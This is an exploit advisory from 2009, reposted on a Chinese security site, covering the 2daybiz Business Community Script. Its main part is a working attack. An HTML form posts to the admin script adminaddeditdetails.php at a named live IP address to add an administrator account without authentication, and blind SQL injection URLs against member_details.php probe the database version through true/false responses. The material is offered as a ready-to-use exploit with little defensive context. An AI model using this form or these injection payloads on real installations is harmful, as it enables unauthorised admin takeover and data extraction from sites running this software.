首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
2daybiz Business Community Script Multiple Remote Vulnerabilities
来源:http://www.2daybiz.com/ 作者:TiGeR-Dz 发布时间:2009-05-15  

-------------------------------------------------------------------------------------------------------------
2daybiz Business Community Script (adminaddeditdetails.php) Add Admin / Remote Blind SQL Injection Exploit
----------------------------------------------------------------------------------------------------
Founder: TiGeR-Dz
Script:Business Community Script
Home:http://www.2daybiz.com/
Download:http://www.2daybiz.com/business_comm_download.html
--------------------------------------------------------------------------------------------------
1/Add Admin Exploit:
----------------------------------------------------------------
<p align="center">
  <body bgcolor="#000000">

  </p>

  <p>&nbsp;</p>
  <p><font size="5" color="#FF0000">CoD3d By </font>
  <font color="#FFFFFF" size="5">:TiGeR.dZ</font></p>
  <form id="form1" name="editinguser" method="post" action="http://98.131.92.231/products/businesscommunity/admin/adminaddeditdetails.php?adduser" onsubmit="return editvalidateform();">
  <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="blue_border">
  <tr>
  <td colspan="3"><div align="center" class="gblue_bg">
  <font size="5" color="#FF0000">Add
  User </font> </div></td>
  </tr>
  <tr>
  <td colspan="3">&nbsp;</td>
  </tr>
  <tr>
  <td width="19%">&nbsp;</td>
  <td width="28%" align="left" class="yoda">
  <font color="#FF0000" size="4">Username</font></td>
  <td width="50%" align="left"><label>
  <input name="username" type="text" id="username" size="25" />
  </label> </td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda">
  <font color="#FF0000" size="4">Password</font></td>
  <td align="left"><label>
  <input name="password" type="password" id="password" size="25" />
  </label></td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda">
  <font color="#FF0000" size="4">Name </font> </td>
  <td align="left"><label>
  <input name="name" type="text" id="name" size="25" />
  </label></td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda">
  <font color="#FF0000" size="4">Email</font></td>
  <td align="left"><label>
  <input name="email" type="text" size="25" />
  </label></td>
  </tr>
  <tr>
  <td colspan="2" class="yoda">&nbsp;</td>
  <td>&nbsp;</td>
  </tr>
  <tr>
  <td colspan="3" class="yoda"><label>
  <div align="center">
  <input type="submit" name="Submit" value="Add User" />
  </div>
  </label></td>
  </tr>
  
  </html>
---------------------------------------------------------------------------------------------------------------------------------------------------
2/ Remote Blind SQL Injection Exploit:
-------------------------------------------
Note: this gaps is Exist within the file of the control panel (adminaddeditdetails.php) :)
 
  1/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=4 False

  2/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=5 True
------------------------------------------------------------------------------------------------------------------------------------------
www.h4ckf0ru.com #
-----------------------------------------------------------------------------------------------------------------------------------


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·StrawBerry 1.1.1 LFI / Remote
·2daybiz Template Monster Clone
·Linux Kernel 2.6.29 ptrace_att
·linux/x86-64 setuid(0) + execv
·DigiMode Maya 1.0.2 (.m3u / .m
·Jieqi CMS versions 1.5 and bel
·Linux Kernel 2.6.x ptrace_atta
·Audioactive Player 1.93b (.m3u
·MaxCMS 2.0 (m_username) Arbitr
·Harland Scripts 11 Products Re
·Family Connections CMS <= 1.9
·Audioactive Player 1.93b (.m3u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved